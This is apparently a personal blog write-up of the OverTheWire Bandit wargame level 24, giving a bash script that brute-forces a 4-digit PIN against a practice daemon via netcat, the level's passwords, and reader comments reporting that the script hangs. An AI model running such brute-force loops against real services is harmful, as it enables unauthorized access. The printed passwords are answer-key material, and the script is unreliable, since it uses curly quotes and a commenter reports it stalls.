Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
The following is my script to perform this brute-forcing techqnies,
#!/bin/bash
pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
pin=0
while [ $pin -lt 10000 ]; do
echo “Attempting PIN: $pin”
attempt=”$(echo $pass24 $pin | nc localhost 30002)”
if ! [[ $attempt == *”Wrong!”* ]]; then
echo -ne “$attempt”
break
fi
((pin++))
done
The script will iterate through each possible PIN to perform brute forcing in identifying the secret pincode of bandit25.
The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.
Pingback: OverTheWire: Bandit Write-up | My Learning Journey
Richardn
February 15, 2020This solution doesn’t work because the shell will be stuck at line:
attempt=”$(echo $pass24 $pin | nc localhost 30002)”
The daemon receives a single trial, outputs a “Wrong!” and waits for the next input, rendering the nc command not finished until a timeout after around 10secs
So your shell takes 10secs for a single trial…
For me ,I echoed all the possible trials into a file called trials by a shell, then:
nc localhost 30002 results
uniq -u results
kongwenbin
August 17, 2021Hi Richardn, my solution works for me back then when I was doing it hands-on, not sure what happened now, I seen a few other comments on something not working with their PuTTY session. Thanks for sharing your solution, I have approved it so others can see it too, I appreciate your sharing 🙂